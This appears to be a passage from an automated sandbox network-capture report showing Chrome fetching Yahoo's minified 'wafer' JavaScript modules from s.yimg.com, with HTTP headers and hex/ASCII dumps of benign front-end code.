                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 2c 77 3d 22 72 65 61 63 74 69 6f 6e 73 22 3d 3d 3d 6d 2c 45 3d 21 21 77 26 26 5f 2c 6b 3d 22 62 6f 6f 6b 6d 61 72 6b 22 3d 3d 3d 68 26 26 5f 2c 41 3d 22 75 72 6c 42 6f 6f 6b 6d 61 72 6b 22 3d 3d 3d 68 26 26 5f 2c 4f 3d 76 6f 69 64 20 30 3b 69 66 28 22 66 6f 6c 6c 6f 77 22 3d 3d 3d 68 29 4f 3d 76 3b 65 6c 73 65 20 69 66 28 77 29 4f 3d 45 3b 65 6c 73 65 20 69 66 28 22 75 72 6c 42 6f 6f 6b 6d 61 72 6b 22 3d 3d 3d 68 29 4f 3d 41 3b 65 6c 73 65 20 69 66 28 22 6c 6f 63 61 74 69 6f 6e 22 3d 3d 3d 68 29 7b 76 61 72 20 53 3d 65 2e 5f 75 74 69 6c 2e 6c 6f 63 61 74 69 6f 6e 41 73 73 69 73 74 54 61 72 67 65 74 45 6c 65 6d 3b 69 66 28 21 53 29 7b 76 61 72 20 49 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 6c 6f 63 61 74 69 6f 6e 2d 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,w="reactions"===m,E=!!w&&_,k="bookmark"===h&&_,A="urlBookmark"===h&&_,O=void 0;if("follow"===h)O=v;else if(w)O=E;else if("urlBookmark"===h)O=A;else if("location"===h){var S=e._util.locationAssistTargetElem;if(!S){var I=o.getAttribute(g+"action-location-a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 74 65 2e 69 6e 50 72 6f 67 72 65 73 73 7c 7c 74 68 69 73 2e 74 72 69 67 67 65 72 28 29 7d 7d 5d 29 2c 65 7d 28 76 29 3b 50 2e 65 76 65 6e 74 73 3d 7b 63 6c 69 63 6b 3a 5b 5b 22 68 61 73 2d 61 63 74 69 6f 6e 2d 63 6c 69 63 6b 22 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 5d 5d 7d 3b 76 61 72 20 4c 3d 50 2c 43 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 31 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 61 29 26 26 28 74 5b 61 5d 3d 72 5b 61 5d 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: te.inProgress||this.trigger()}}]),e}(v);P.events={click:[["has-action-click","handleClick"]]};var L=P,C=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var r=arguments[e];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(t[a]=r[a])
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 72 2e 67 65 74 28 65 29 2e 70 75 73 68 28 74 68 69 73 29 2c 72 2e 67 65 74 28 65 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 74 61 74 75 73 44 69 64 55 70 64 61 74 65 28 74 29 7d 29 7d 2c 4c 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 4f 70 70 6f 73 69 74 65 41 63 74 69 6f 6e 53 74 61 74 75 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 6d 2e 5f 73 74 61 74 65 2e 69 64 49 6e 73 74 61 6e 63 65 4d 61 70 70 69 6e 67 3b 72 2e 68 61 73 28 65 29 7c 7c 72 2e 73 65 74 28 65 2c 5b 5d 29 2c 72 2e 67 65 74 28 65 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 74 61 74 75 73 44 69 64 55 70 64 61 74 65 28 74 29 7d 29 7d 2c 4c 2e 70 72 6f 74 6f 74 79 70 65 2e 75 70 64 61 74 65 41 72 69 61 4c 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r.get(e).push(this),r.get(e).forEach(function(e){e.statusDidUpdate(t)})},L.prototype.setOppositeActionStatus=function(t,e){var r=m._state.idInstanceMapping;r.has(e)||r.set(e,[]),r.get(e).forEach(function(e){e.statusDidUpdate(t)})},L.prototype.updateAriaLi


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              143192.168.2.45117387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC369OUTGET /aaq/wf/wf-native-da-1.0.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 3oLZzaERarmOJ9OT7v8I5BALA51a5kxRnOj6HBo0qk/RGy+vOkFNbS3kSW3YWGoHZHW5LQll6UY=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: A854Q2RZ7YDQDYAJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 06:05:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 13 Mar 2024 00:20:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "b29975904d91fe6ff597a7fd5a315391"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 078ylwgkz5Ax5V37JvikKo6D_ggB.CfO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 11230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 133706
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6e 61 74 69 76 65 2d 64 61 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6e 61 74 69 76 65 2d 64 61 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 72 65 74 75 72 6e 20 65 28 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),u=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.definePro
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 76 69 65 77 70 6f 72 74 57 69 74 68 50 72 65 66 65 74 63 68 22 3b 72 65 74 75 72 6e 20 75 2e 5f 75 74 69 6c 3d 66 28 7b 7d 2c 75 2e 5f 75 74 69 6c 2c 7b 63 6f 6e 66 69 67 3a 76 2c 65 6c 65 6d 3a 65 2c 65 72 72 6f 72 43 6c 61 73 73 3a 61 2c 69 64 3a 68 2c 6e 61 74 69 76 65 44 61 43 6f 6e 66 69 67 3a 69 2c 6f 66 66 73 65 74 58 3a 4e 75 6d 62 65 72 28 4f 29 7c 7c 30 2c 6f 66 66 73 65 74 59 3a 4e 75 6d 62 65 72 28 50 29 7c 7c 30 2c 73 65 63 74 69 6f 6e 3a 70 2c 73 65 6c 65 63 74 6f 72 3a 73 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 63 2c 74 61 62 6f 6f 6c 61 43 6f 6e 66 69 67 3a 64 2c 74 61 72 67 65 74 45 6c 65 6d 3a 54 2c 74 72 69 67 67 65 72 3a 41 2c 74 79 70 65 3a 67 7d 29 2c 75 2e 5f 73 74 61 74 65 3d 7b 73 68 6f 75 6c 64 50 72 65 66 65 74 63 68 46 6f 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: viewportWithPrefetch";return u._util=f({},u._util,{config:v,elem:e,errorClass:a,id:h,nativeDaConfig:i,offsetX:Number(O)||0,offsetY:Number(P)||0,section:p,selector:s,successClass:c,taboolaConfig:d,targetElem:T,trigger:A,type:g}),u._state={shouldPrefetchFor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 3a 30 2c 63 61 63 68 65 53 74 72 61 74 65 67 79 3a 22 6e 65 74 77 6f 72 6b 46 69 72 73 74 22 2c 74 69 6d 65 6f 75 74 3a 62 7d 3b 6d 28 5f 2c 75 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 73 79 6e 63 41 73 73 65 74 73 28 65 2e 61 73 73 65 74 73 29 2c 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 64 2e 64 65 73 74 72 6f 79 28 63 2c 7b 64 65 73 74 72 6f 79 53 65 6c 66 3a 21 31 7d 29 3b 76 61 72 20 69 3d 72 7c 7c 7b 7d 2c 73 3d 69 2e 68 74 6d 6c 3b 69 66 28 22 70 72 65 66 65 74 63 68 22 21 3d 3d 69 2e 5f 73 74 6f 72 61 67 65 53 6f 75 72 63 65 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :0,cacheStrategy:"networkFirst",timeout:b};m(_,u).then(function(t){e(t)}).catch(function(e){r(e)})}).then(function(e){return d.syncAssets(e.assets),e}).then(function(r){d.destroy(c,{destroySelf:!1});var i=r||{},s=i.html;if("prefetch"!==i._storageSource){v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 69 6f 6e 3a 63 2c 73 65 6c 65 63 74 6f 72 3a 66 2c 73 68 6f 75 6c 64 50 72 65 66 65 74 63 68 46 6f 72 56 69 65 77 70 6f 72 74 3a 74 68 69 73 2e 5f 73 74 61 74 65 2e 73 68 6f 75 6c 64 50 72 65 66 65 74 63 68 46 6f 72 56 69 65 77 70 6f 72 74 2c 74 61 62 6f 6f 6c 61 43 6f 6e 66 69 67 3a 6c 2c 74 72 69 67 67 65 72 3a 75 2c 74 79 70 65 3a 76 7d 7d 7d 5d 29 2c 74 7d 28 70 29 2c 6a 3d 4f 2c 54 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 41 3d 54 2e 62 61 73 65 2c 46 3d 54 2e 75 74 69 6c 73 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2c 41 2e 5f 75 70 64 61 74 65 53 74 61 74 65 28 72 29 3b 76 61 72 20 6e 3d 46 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ion:c,selector:f,shouldPrefetchForViewport:this._state.shouldPrefetchForViewport,taboolaConfig:l,trigger:u,type:v}}}]),t}(p),j=O,T=window.wafer,A=T.base,F=T.utils,I=function(e,t){var r=document.createElement("div");r.innerHTML=e,A._updateState(r);var n=F.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 61 72 54 69 6d 65 6f 75 74 28 6e 29 2c 74 5b 65 5d 3d 21 30 2c 6e 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 5f 77 61 66 65 72 4e 61 74 69 76 65 44 61 43 6f 6c 6c 65 63 74 69 6f 6e 2e 63 6c 65 61 72 46 65 74 63 68 49 6e 50 72 6f 67 72 65 73 73 28 29 7d 2c 38 65 33 29 7d 2c 69 73 46 65 74 63 68 49 6e 50 72 6f 67 72 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 2c 63 6c 65 61 72 46 65 74 63 68 49 6e 50 72 6f 67 72 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 29 2c 74 5b 65 5d 3d 21 31 2c 72 5b 65 5d 26 26 28 72 5b 65 5d 3d 21 31 2c 4e 2e 73 79 6e 63 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 29 7d 7d 7d 28 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: arTimeout(n),t[e]=!0,n=setTimeout(function(){window.__waferNativeDaCollection.clearFetchInProgress()},8e3)},isFetchInProgress:function(e){return t[e]},clearFetchInProgress:function(e){clearTimeout(n),t[e]=!1,r[e]&&(r[e]=!1,N.sync(document.body))}}}();var
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 63 3d 21 30 29 7b 76 61 72 20 64 3d 75 2e 76 61 6c 75 65 2c 68 3d 64 2e 69 6e 73 74 61 6e 63 65 2c 67 3d 68 2e 63 6f 6e 66 69 67 2c 70 3d 67 2e 73 68 6f 75 6c 64 50 72 65 66 65 74 63 68 46 6f 72 56 69 65 77 70 6f 72 74 2c 79 3d 67 2e 74 79 70 65 3b 69 66 28 70 29 7b 76 61 72 20 77 3d 68 2e 63 6f 6e 66 69 67 2e 73 65 63 74 69 6f 6e 3b 69 66 28 77 7c 7c 28 77 3d 79 29 2c 77 3d 3d 3d 65 29 7b 76 61 72 20 6d 3d 68 2e 63 6f 6e 66 69 67 2c 62 3d 6d 2e 63 6f 6e 66 69 67 2c 5f 3d 76 6f 69 64 20 30 3d 3d 3d 62 3f 7b 7d 3a 62 2c 43 3d 6d 2e 65 6c 65 6d 2c 50 3d 6d 2e 69 64 2c 4f 3d 6d 2e 6e 61 74 69 76 65 44 61 43 6f 6e 66 69 67 2c 6a 3d 76 6f 69 64 20 30 3d 3d 3d 4f 3f 7b 7d 3a 4f 3b 69 66 28 73 3d 77 2c 61 3d 61 7c 7c 6a 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ext()).done);c=!0){var d=u.value,h=d.instance,g=h.config,p=g.shouldPrefetchForViewport,y=g.type;if(p){var w=h.config.section;if(w||(w=y),w===e){var m=h.config,b=m.config,_=void 0===b?{}:b,C=m.elem,P=m.id,O=m.nativeDaConfig,j=void 0===O?{}:O;if(s=w,a=a||j.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC830INData Raw: 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2c 72 3d 74 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6e 3d 74 2e 6d 6f 75 6e 74 65 64 3b 30 3d 3d 3d 72 2e 73 69 7a 65 7c 7c 6e 7c 7c 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 6e 74 65 64 3d 21 30 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 72 65 66 65 74 63 68 28 29 7d 2c 31 30 29 7d 7d 2c 7b 6b 65 79 3a 22 74 72 69 67 67 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2e 67 65 74 28 65 29 3b 69 66 28 74 29 7b 74 2e 69 6e 73 74 61 6e 63 65 2e 66 65 74 63 68 28 29 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: lue:function(){var e=this,t=this._state,r=t.elementInstances,n=t.mounted;0===r.size||n||(this._state.mounted=!0),setTimeout(function(){e.prefetch()},10)}},{key:"trigger",value:function(e){var t=this._state.elementInstances.get(e);if(t){t.instance.fetch()}


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              144192.168.2.45116687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC364OUTGET /aaq/wf/wf-menu-1.3.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: vBz5bAKOUM3dnQ9Aq3lsoqNtpMl5ypaT30Nm5e/KdG9lGOQMIq1VgAzVETNJKaUk7t7ZQMSzpao=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: K6V7TXB101CMQ4EN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 06 Oct 2024 10:44:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 20 May 2024 05:06:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "a9df8e56a02208beacf0ded260dd1d62"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: k7mozDehHPh1alwYBSfHyyyF9CskFHrL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 203354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6d 65 6e 75 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6d 65 6e 75 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-menu",[],t):"object"==typeof exports?exports["wafer-menu"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
